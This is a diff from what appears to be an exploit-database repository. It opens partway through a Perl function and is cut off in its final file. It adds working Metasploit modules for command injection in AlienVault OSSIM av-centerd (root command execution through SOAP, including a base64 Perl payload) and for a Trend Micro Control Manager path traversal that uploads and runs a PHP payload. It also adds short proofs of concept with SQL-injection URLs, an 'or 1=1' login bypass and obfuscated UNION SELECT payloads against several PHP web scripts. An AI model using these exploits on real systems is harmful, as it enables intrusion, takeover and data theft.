+        my $result = qx{$command};
+        $SIG{CHLD} = 'IGNORE';
+        $result >>= 8 ;
+        if ( $result == 0 ) {
+            verbose_log_file ("LICENSE $license_type: SUCCESS. Installed");
+            unlink $deb;
+            unlink $header;
+            @out = ( '0', 'SUCCESS. Installed' );
+            return \@out;
+        }
+        else
+        {
+            verbose_log_file ("LICENSE $license_type: ERROR. Install failed");
+            @out = ( '2', 'ERROR. Install failed' );
+            unlink $deb;
+            unlink $header;
+            return \@out;
+        }
+    }
+    else
+    {
+        my $error_msg;
+        verbose_log_file ("LICENSE $license_type: ERROR MSG");
+        open LFILE, "< $header" or die "Not  $!";
+        my @header_msg = <LFILE>;
+        close(LFILE);
+        foreach(@header_msg){
+            verbose_log_file ($_);
+            if ($_ =~ m/X-AV-ERROR/)
+            {
+                $error_msg = $_;
+            }
+        }
+        unlink $header;
+
+        @out = ( '2', substr($error_msg, 12, -1)); # Remove 'X-AV-ERROR: 'and \n
+        return \@out;
+    }
+}
+
diff --git a/platforms/linux/remote/42708.rb b/platforms/linux/remote/42708.rb
new file mode 100755
index 000000000..94c7ed716
--- /dev/null
+++ b/platforms/linux/remote/42708.rb
@@ -0,0 +1,154 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize
+		super(
+			'Name'        => 'Alienvault OSSIM av-centerd Util.pm sync_rserver Command Execution',
+			'Description' => %q{
+				This module exploits a command injection vulnerability found within the sync_rserver
+				function in Util.pm. The vulnerability is triggered due to an incomplete blacklist
+				during the parsing of the $uuid parameter. This allows for the escaping of a system
+				command allowing for arbitrary command execution as root
+			},
+			'References'  =>
+			[
+				[ 'CVE', '2014-3804' ],
+				[ 'ZDI', '14-197' ],
+				[ 'URL', 'http://forums.alienvault.com/discussion/2690' ],
+			],
+			'Author'      => [ 'james fitts' ],
+			'License'     => MSF_LICENSE,
+			'DisclosureDate' => 'Jun 11 2014')
+
+		register_options([
+			Opt::RPORT(40007),
+			OptBool.new('SSL',   [true, 'Use SSL', true]),
+			OptString.new('CMD', [ false, 'This is the file to download', 'touch /tmp/file.txt'])
+		], self.class)
+	
+	end
+
+	def run
+
+		soap =  "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n"
+		soap += "<soap:Envelope xmlns:soap=\"http:\/\/schemas.xmlsoap.org/soap/envelope/\"\r\n"
+		soap += "xmlns:soapenc=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding/\" xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\r\n"
+		soap += "xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\r\n"
+		soap += "soap:encodingStyle=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\">\r\n"
+		soap += "<soap:Body>\r\n"
+		soap += "<sync_rserver xmlns=\"AV\/CC\/Util\">\r\n"
+		soap += "<c-gensym3 xsi:type=\"xsd:string\">All</c-gensym3>\r\n"
+		soap += "<c-gensym5 xsi:type=\"xsd:string\">& #{datastore['CMD']} </c-gensym5>\r\n"
+		soap += "<c-gensym7 xsi:type=\"xsd:string\">#{datastore['RHOST']}</c-gensym7>\r\n"
+		soap += "<c-gensym9 xsi:type=\"xsd:string\">#{Rex::Text.rand_text_alpha(4 + rand(4))}</c-gensym9>\r\n"
+		soap += "</sync_rserver>\r\n"
+		soap += "</soap:Body>\r\n"
+		soap += "</soap:Envelope>\r\n"
+
+		res = send_request_cgi(
+			{
+				'uri'	=>	'/av-centerd',
+				'method'	=>	'POST',
+				'ctype'		=>	'text/xml; charset=UTF-8',
+				'data'		=>	soap,
+				'headers'	=>	{
+					'SOAPAction'	=>	"\"AV/CC/Util#sync_rserver\""
+				}
+			}, 20)
+
+		if res && res.code == 200
+			print_good("Command executed successfully!")
+		else
+			print_bad("Something went wrong...")
+		end
+
+	end
+
+end
+__END__
+
+/usr/share/alienvault-center/lib/AV/CC/Util.pm
+
+sub sync_rserver
+{
+    my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname ) = @_;
+    verbose_log_file(
+        "SYNC RSERVER TASK : Received call from $uuid : ip source = $admin_ip, hostname = $hostname:($funcion_llamada,$nombre)"
+    );
+
+    if ($uuid =~  /[;`\$\<\>\|]/) {
+        console_log_file("Not allowed uuid: $uuid in sync_rserver\n");
+        my @ret = ("Error");
+        return \@ret;
+    }
+
+    my $conn = Avtools::get_database();
+    my $sqlfile = "/tmp/sync_${uuid}.sql";
+    my $sqlfile_old = "/tmp/sync_${uuid}.sql.old";
+    my $sqlfile_md5 = `md5sum $sqlfile | awk '{print \$1}'`;
+    my $sqlfile_content;
+    my $status = 1;
+    my $counter = 0;
+    my @ret;
+    my $query = qq{};
+    my $dbq;
+
+    if ( -f $sqlfile_old )
+    {
+        my $sqlfile_old_md5 = `md5sum $sqlfile_old | awk '{print \$1}'`;
+        debug_log_file ("Old MD5: $sqlfile_old_md5 New MD5: $sqlfile_md5");
+        if ( $sqlfile_md5 eq $sqlfile_old_md5 )
+        {
+            unlink $sqlfile;
+            verbose_log_file ("Already sync'ed!");
+            return "0";
+        }
+        else
+        {
+            unlink $sqlfile_old;
+        }
+    }
+
+    my $query_array = `ossim-db < $sqlfile 2>&1`;
+    $query_array =~ s/[\s\n]+$//g;
+    if ($query_array ne '')
+    {
+        $status = $query_array;
+    }
+    else
+    {
+        $status = 0;
+    }
+
+    if ( ! (defined $status) or $status == 0 )
+    {
+        if ( grep /RESTART\sOSSIM\-SERVER/, $sqlfile )
+        {
+            verbose_log_file("RESTART OSSIM-SERVER MARK found. Restarting ossim-server");
+            system('/etc/init.d/ossim-server restart');
+        }
+        else
+        {
+            debug_log_file("RESTART OSSIM-SERVER MARK not found. Skipping ossim-server restart");
+        }
+
+        $query = qq{REPLACE INTO alienvault.config (conf, value) VALUES ('latest_asset_change', utc_timestamp())};
+        debug_log_file($query);
+        $dbq = $conn->prepare($query);
+        $dbq->execute();
+        $dbq->finish();
+    }
+    else
+    {
+        verbose_log_file ("Error syncing rservers: ${status}");
+    }
+
+    debug_log_file("Move file: $sqlfile");
+    move ($sqlfile, $sqlfile . ".old");
+
+#    push @ret, "0";
+    return "0";
+}
diff --git a/platforms/linux/remote/42709.rb b/platforms/linux/remote/42709.rb
new file mode 100755
index 000000000..715b04266
--- /dev/null
+++ b/platforms/linux/remote/42709.rb
@@ -0,0 +1,171 @@
+require 'msf/core'
+require 'rexml/document'
+
+class MetasploitModule < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include REXML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'		=> 'Alienvault OSSIM av-centerd Command Injection get_log_line',
+			'Description'	=> %q{
+				This module exploits a command injection flaw found in the get_log_line
+				function found within Util.pm. The vulnerability is triggered due to an
+				unsanitized $r_file parameter passed to a string which is then executed
+				by the system
+			},
+			'Author' => [ 'james fitts' ],
+			'License' => MSF_LICENSE,
+			'References' =>
+				[
+					[ 'CVE', '2014-3805' ],
+					[ 'OSVDB', '107992' ]
+				],
+			'Privileged'	=> true,
+			'Platform'		=> 'unix',
+			'Arch'			=> ARCH_CMD,
+			'DefaultOptions' =>
+				{
+					'SSL' => true,
+				},
+			'Payload' =>
+				{
+					'Compat'	=> {
+						'RequiredCmd'	=> 'perl netcat-e openssl python gawk'
+					}
+				},
+			'DefaultTarget'	=> 0,
+			'Targets' =>
+				[
+					['Alienvault <= 4.7.0',{}]
+				],
+			'DisclosureDate' => 'Jul 18 2014'))
+
+			register_options([Opt::RPORT(40007)], self.class)
+	end
+
+	def check
+		version = ""
+		res = send_soap_request("get_dpkg")
+
+		if res &&
+			res.code == 200 &&
+			res.headers['SOAPServer'] &&
+			res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
+			res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/
+
+			version = $1
+		end
+
+		if version.empty? || version >= "4.7.0"
+			return Exploit::CheckCode::Safe
+		else
+			return Exploit::CheckCode::Appears
+		end
+	end
+
+	def build_soap_request(method)
+		xml = Document.new
+		xml.add_element(
+			"soap:Envelope",
+			{
+				"xmlns:xsi"				=> "http://www.w3.org/2001/XMLSchema-instance",
+				"xmlns:soapenc"			=> "http://schemas.xmlsoap.org/soap/encoding/",
+				"xmlns:xsd"				=> "http://www.w3.org/2001/XMLSchema",
+				"soap:encodingStyle"	=> "http://schemas.xmlsoap.org/soap/encoding/",
+				"xmlns:soap"			=> "http://schemas.xmlsoap.org/soap/envelope/"
+			})
+
+		body = xml.root.add_element("soap:Body")
+		m = body.add_element(method, { 'xmlns'	=> "AV/CC/Util" })
+
+		args = []
+		args[0] = m.add_element("c-gensym3", {'xsi:type' => 'xsd:string'})
+		args[0].text = "All"
+
+		args[1] = m.add_element("c-gensym5", {'xsi:type' => 'xsd:string'})
+		args[1].text = "423d7bea-cfbc-f7ea-fe52-272ff7ede3d2"
+
+		args[2] = m.add_element("c-gensym7", {'xsi:type' => 'xsd:string'})
+		args[2].text = "#{datastore['RHOST']}"
+
+		args[3] = m.add_element("c-gensym9", {'xsi:type' => 'xsd:string'})
+		args[3].text = "#{rand_text_alpha(4 + rand(4))}"
+
+		args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
+		args[4].text = "/var/log/auth.log"
+
+		args[5] = m.add_element("c-gensym13", {'xsi:type' => 'xsd:string'})
+		perl_payload =  "system(decode_base64"
+		perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
+		args[5].text = "1;perl -MMIME::Base64 -e '#{perl_payload}';"
+
+		xml.to_s
+	end
+
+	def send_soap_request(method, timeout=20)
+		soap = build_soap_request(method)
+
+		res = send_request_cgi({
+			'uri'		=> '/av-centerd',
+			'method'	=> 'POST',
+			'ctype'		=> 'text/xml; charset=UTF-8',
+			'data'		=> soap,
+			'headers'	=> {
+				'SOAPAction'	=> "\"AV/CC/Util##{method}\""
+			}
+		}, timeout)
+
+		res
+	end
+
+	def exploit
+		send_soap_request("get_log_line", 1)
+	end
+end
+__END__
+
+/usr/share/alienvault-center/lib/AV/CC/Util.pm
+
+sub get_log_line {
+        my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file, $number_lines )
+        = @_;
+
+    verbose_log_file(
+        "GET LOG LINE  : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$r_file)"
+    );
+
+    my @ret = ("$systemuuid");
+
+    if ( $r_file =~ /\.\./ ){
+                        push(@ret,"File not auth");
+                        return \@ret;
+        }
+
+        if ( $number_lines <= 0) {
+                        push(@ret,"Error in number lines");
+                        return \@ret;
+        }
+
+    if (( $r_file =~ /^\/var\/log\// ) or ( $r_file =~ /^\/var\/ossec\/alerts\// ) or ( $r_file =~ /^\/var\/ossec\/logs\// )){
+                        if (! -f "$r_file" ){
+                                push(@ret,"File not found");
+                                return \@ret;
+                        }
+                        push(@ret,"ready");
+
+                        my $command = "tail -$number_lines $r_file";
+                        #push(@ret,"$command");
+                        #my @content = `tail -$number_lines $r_file`;
+                        my @content = `$command`;
+                        push(@ret,@content);
+                        return \@ret;
+        }
+    else {
+                push(@ret,"path not auth");
+                return \@ret;
+        }
+}
+
diff --git a/platforms/php/remote/42692.rb b/platforms/php/remote/42692.rb
new file mode 100755
index 000000000..3eb2e9d8c
--- /dev/null
+++ b/platforms/php/remote/42692.rb
@@ -0,0 +1,116 @@
+require 'msf/core'
+require 'msf/core/exploit/php_exe'
+
+class MetasploitModule < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::FileDropper
+	include Msf::Exploit::PhpEXE
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Trend Micro Control Manager importFile Directory Traversal RCE',
+			'Description'    => %q{
+				This module exploits a directory traversal vulnerability found in Trend Micro
+				Control Manager. The vulnerability is triggered when sending a specially crafted
+				fileName (containing ../'s) parameter to the importFile.php script. This will allow
+				for writing outside of the ImportPolicy directory.
+			},
+			'Author'         => [ 'james fitts' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: $',
+			'References'     =>
+				[
+					[ 'ZDI', '17-060' ],
+					[ 'URL', 'https://success.trendmicro.com/solution/1116624' ]
+				],
+			'Payload'	 =>
+				{
+					'BadChars' => "\x00",
+				},
+			'Platform'       => 'php',
+			'Arch'		 => ARCH_PHP,
+			'Targets'        =>
+				[
+					[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
+				],
+			'DefaultTarget' => 0,
+			'DisclosureDate' => 'Feb 07 2017'))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [true, 'The base path to TMCM', '/webapp']),
+				OptBool.new('SSL', [ true, 'Use SSL', true]),
+				Opt::RPORT(443),
+			], self.class)
+	end
+
+	def exploit
+		require 'securerandom'
+
+		uri =	 target_uri.path
+		uri << '/' if uri[-1,1] != '/'
+
+		boundary = SecureRandom.hex
+		payload_name = "#{rand_text_alpha(5)}.php"
+		print_status("Uploading #{payload_name} to the server...")
+
+		cookies =  "ASP_NET_SessionId=55hjl0burcvx21uslfxjbabs; "
+		cookies << "wf_cookie_path=%2F; WFINFOR=#{rand_text_alpha(10)}; "
+		cookies << "PHPSESSID=fc4o2lg5fpgognc28sjcitugj1; "
+		cookies << "wf_CSRF_token=bd52b54ced23d3dc257984f68c39d34b; "
+		cookies << "un=a8cad04472597b0c1163743109dad8f1; userID=1; "
+		cookies << "LANG=en_US; "
+		cookies << "wids=modTmcmCriticalEvents%2CmodTmcmUserThreatDetection%2CmodTmcmAppStatusSrv%2CmodTmcmTopThreats%2CmodTmcmEndpointThreatDetection%2CmodTmcmCompCompliance%2C; "
+		cookies << "lastID=65; cname=mainConsole; theme=default; lastTab=-1"
+
+		post_body = []
+		post_body << "--#{boundary}\r\n"
+		post_body << "Content-Disposition: form-data; name=\"action\"\r\n\r\n"
+		post_body << "importPolicy\r\n"
+		post_body << "--#{boundary}\r\n"
+		post_body << "Content-Disposition: form-data; name=\"fileSize\"\r\n\r\n"
+		post_body << "2097152\r\n"
+		post_body << "--#{boundary}\r\n"
+		post_body << "Content-Disposition: form-data; name=\"fileName\"\r\n\r\n"
+		post_body << "../../../widget_60_2899/repository/db/sqlite/#{payload_name}\r\n"
+		post_body << "--#{boundary}\r\n"
+		post_body << "Content-Disposition: form-data; name=\"filename\";\r\n"
+		post_body << "filename=\"policy.cmpolicy\"\r\n"
+		post_body << "Content-Type: application/octet-stream\r\n\r\n"
+		post_body << "<?php #{payload.raw} ?>\r\n\r\n"
+		post_body << "--#{boundary}--\r\n"
+
+		res = send_request_cgi({
+			'method'	=> 'POST',
+			'uri'			=>	normalize_uri("#{uri}", "widget", "repository", "widgetPool", "wp1", "widgetBase", "modTMCM", "inc", "importFile.php"),
+			'ctype'		=>	"multipart/form-data; boundary=#{boundary}",
+			'data'		=>	post_body.join,
+			'headers'	=>	{
+				'Cookie'					=>	cookies,
+				'Accept-Encoding'	=>	"gzip;q=1.0,deflate;q=0.6,identity;q=0.3",
+				'Connection'			=>	"close",
+				'Accept'					=>	"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+				'Accept-Language'	=>	"en-US,en;q=0.5",
+			},
+		})
+
+		if res.body =~ /Import Successfully/
+			print_good("#{payload_name} uploaded successfully!")
+			print_status("Attempting to execute payload...")
+
+			res = send_request_cgi({
+				'method'	=>	'GET',
+				'uri'			=>	normalize_uri("#{uri}", "widget_60_2899", "repository", "db", "sqlite", "#{payload_name}"),
+				'headesr'	=>	{
+					'Cookie'	=>	cookies
+				}
+			})
+
+		else
+			print_error("Something went wrong...")
+		end
+
+	end
+end
diff --git a/platforms/php/webapps/42667.txt b/platforms/php/webapps/42667.txt
new file mode 100755
index 000000000..127956a7a
--- /dev/null
+++ b/platforms/php/webapps/42667.txt
@@ -0,0 +1,31 @@
+# # # # # 
+# Exploit Title: Unique Low Bid Auction Script 3.3 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/unique-low-bid-auction-script.htm
+# Demo: http://www.icloudcenter.net/demos/iclowbidauction/
+# Version: 3.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/admin
+# 
+# User: 'or 1=1 or ''=' Pass: anything
+# 
+# http://localhost/[PATH]/admin/viewuserips.php?id=[SQL]
+
+# http://localhost/[PATH]/admin/editadminuser.php?id=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42668.txt b/platforms/php/webapps/42668.txt
new file mode 100755
index 000000000..abe75f8d8
--- /dev/null
+++ b/platforms/php/webapps/42668.txt
@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: MLM Software Script 2.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/mlm-script.htm
+# Demo: http://www.icloudcenter.net/demos/icmlm/
+# Version: 2.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+# 
+# '+/*!00007uNiOn*/+/*!00007SelEct*/+0x283129,0x283229,0x3c68313e496873616e2053656e63616e3c2f68313e,(/*!50000Select*/+export_set(5,@:=0,(/*!50000select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!50000table_name*/,0x3c6c693e,2),/*!50000column_name*/,0xa3a,2)),@,2))--+-
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42669.txt b/platforms/php/webapps/42669.txt
new file mode 100755
index 000000000..02b751e1d
--- /dev/null
+++ b/platforms/php/webapps/42669.txt
@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Hotel Reservation Site Script 3.3 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/hotel-reservation-site-script.htm
+# Demo: http://icloudcenter.net/demos/ichotelreservation/
+# Version: 3.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42670.txt b/platforms/php/webapps/42670.txt
new file mode 100755
index 000000000..8b6808df6
--- /dev/null
+++ b/platforms/php/webapps/42670.txt
@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: eBay like Auction PHP Script 2.2 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/ebay-like-auction-script.htm
+# Demo: http://icloudcenter.net/demos/icauction/
+# Version: 2.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/item.php?id=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42671.txt b/platforms/php/webapps/42671.txt
new file mode 100755
index 000000000..a2d3a4a24
--- /dev/null
+++ b/platforms/php/webapps/42671.txt
@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Doctor Appointment Script 1.3 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/doctor-appointment-script.htm
+# Demo: http://icloudcenter.net/demos/icdoctorappointment/
+# Version: 1.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42672.txt b/platforms/php/webapps/42672.txt
new file mode 100755
index 000000000..52baa8e6b
--- /dev/null
+++ b/platforms/php/webapps/42672.txt
@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Restaurant Site Script 1.4 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/restaurant-site-script.htm
+# Demo: http://icloudcenter.net/demos/icrestaurant/
+# Version: 1.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/index.php?page=static_pages&key=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42673.txt b/platforms/php/webapps/42673.txt
new file mode 100755
index 000000000..74badf9e4
--- /dev/null
+++ b/platforms/php/webapps/42673.txt
@@ -0,0 +1,31 @@
+# # # # # 
+# Exploit Title: Dutch Auction Script 1.2 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/dutch-auction-script.htm
+# Demo: http://icloudcenter.net/demos/icdutchauction/
+# Version: 1.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/admin
+# 
+# User: 'or 1=1 or ''=' Pass: anything
+# 
+# http://localhost/[PATH]/admin/viewuserips.php?id=[SQL]
+
+# http://localhost/[PATH]/admin/editadminuser.php?id=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42674.txt b/platforms/php/webapps/42674.txt
new file mode 100755
index 000000000..95b3a2f17
--- /dev/null
+++ b/platforms/php/webapps/42674.txt
@@ -0,0 +1,29 @@
+# # # # # 
+# Exploit Title: Auto Dealer Car Sales PHP Script 2.2 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/auto-dealer-car-sales-script.htm
+# Demo: http://icloudcenter.net/demos/icautosales/
+# Version: 2.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/index.php?cmd=do_car_search&type=7&mod_id=[SQL]
+# 
+# http://localhost/[PATH]/index.php?cmd=advertise_details&category=car&aid=[SQL]
+# 
+# http://localhost/[PATH]/index.php?cmd=directory&parent=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42675.txt b/platforms/php/webapps/42675.txt
new file mode 100755
index 000000000..ec98c642e
--- /dev/null
+++ b/platforms/php/webapps/42675.txt
@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Travel Site Script 2.2 - Authentication Bypass
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/traveling-website-script.htm
+# Demo: http://icloudcenter.net/demos/ICPenny/
+# Version: 2.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/admin
+# 
+# User: 'or 1=1 or ''=' Pass: anything
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42676.txt b/platforms/php/webapps/42676.txt
new file mode 100755
index 000000000..dd3a1f4fc
--- /dev/null
+++ b/platforms/php/webapps/42676.txt
@@ -0,0 +1,31 @@
+# # # # # 
+# Exploit Title: Classifieds Software Script Like Craigslist 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/craigslist-like-classifieds-script.htm
+# Demo: http://icloudcenter.net/demos/icclassifieds/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/post_details.php?city=0&id=[SQL]
+# 
+# -3061'++/*!00004UNION*/+/*!00004SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,(/*!00004Select*/+export_set(5,@:=0,(/*!00004select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00004table_name*/,0x3c6c693e,2),/*!00004column_name*/,0xa3a,2)),@,2)),0x496873616e2053656e63616e,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137--+- 
+# 
+# http://localhost/[PATH]/view_posts.php?city=[SQL]
+# 
+# http://localhost/[PATH]/index.php?c=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42677.txt b/platforms/php/webapps/42677.txt
new file mode 100755
index 000000000..a52346313
--- /dev/null
+++ b/platforms/php/webapps/42677.txt
@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Students Course Assessment Test Script 1.2 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/student-course-assessment-test-script.htm
+# Demo: http://icloudcenter.net/demos/icstudents/
+# Version: 1.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/index.php?page=static_page&key=[SQL]
+# 
+# -EfE'+/*!00009UniOn*/+/*!00009SelEcT*/+0x31,0x32,0x3c68313e494853414e2053454e43414e3c2f68313e,(/*!00009Select*/+export_set(5,@:=0,(/*!00009select*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00009table_name*/,0x3c6c693e,2),/*!00009column_name*/,0xa3a,2)),@,2))--+-
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42678.txt b/platforms/php/webapps/42678.txt
new file mode 100755
index 000000000..dd83bcef2
--- /dev/null
+++ b/platforms/php/webapps/42678.txt
@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: ICSurvey- Survey Creating Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/survey-creating-script.htm
+# Demo: http://icloudcenter.net/demos/icsurvey/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/index.php?page=static_page&key=[SQL]
+# 
+# http://localhost/[PATH]/survey.php?page=preview&test=[SQL]
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42679.txt b/platforms/php/webapps/42679.txt
new file mode 100755
index 000000000..41b2176a8
--- /dev/null
+++ b/platforms/php/webapps/42679.txt
@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Jewelry Store Site Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/jewelry-site-script.htm
